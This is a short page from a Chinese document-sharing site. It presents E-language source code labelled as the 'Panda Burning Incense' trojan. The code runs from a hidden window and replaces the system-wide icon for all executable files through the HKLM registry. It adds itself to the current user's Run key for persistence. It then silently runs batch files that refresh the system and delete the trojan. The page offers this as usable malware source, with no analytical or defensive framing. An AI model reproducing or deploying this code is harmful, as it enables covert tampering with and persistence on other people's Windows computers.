【#文档大全网# 导语】以下是®文档大全网的小编为您整理的《熊猫烧香代码》,欢迎阅读!
(1).先创建一个窗口,里面放一个始终,把窗口可视改成“假”。;
(2).代码如下: .版本 2
.支持库 eAPI
.子程序 __启动窗口_创建完毕
延时 (1000) ' 等待延时
提取资源文件图标 (取运行目录 () + “\” + 取执行文件名 (), 0, “C:\windows\system32\Aver.ico”, ) ' 替换系统exe图标
写注册项 (#本地机器, “SOFTWARE\Classes\exefile\DefaultIcon\”, “C:\windows\system32\Aver.ico”) ' 写到注册表键值
写注册项 (#现行用户, “Software\Microsoft\Windows\CurrentVersion\Run\” + 取执行文件名 (), 取运行目录 () + “\” + 取执行文件名 ()) ' 写让注册表键值删除后可恢复木马实行自启动
写到文件 (取运行目录 () + “\del.bat”, #del) ' 写出删除木马自身文件批处理 写到文件 (取运行目录 () + “\ddel.bat”, #ddel) ' 写出自动刷新系统批处理
运行 (取运行目录 () + “\ddel.bat”, 假, #隐藏窗口) ' 运行自动刷新系统批处理 延时 (500) ' 等待延时
运行 (“cmd /c taskkill /f /im Aver.exe”, 假, #隐藏窗口) ' 结束木马自身进程
运行 (取运行目录 () + “\del.bat”, 假, #隐藏窗口) ' 写出删除木马自身文件批处理 结束 ()
本文来源:https://www.wddqxz.cn/c364a3086bd97f192279e984.html
2022-07-11
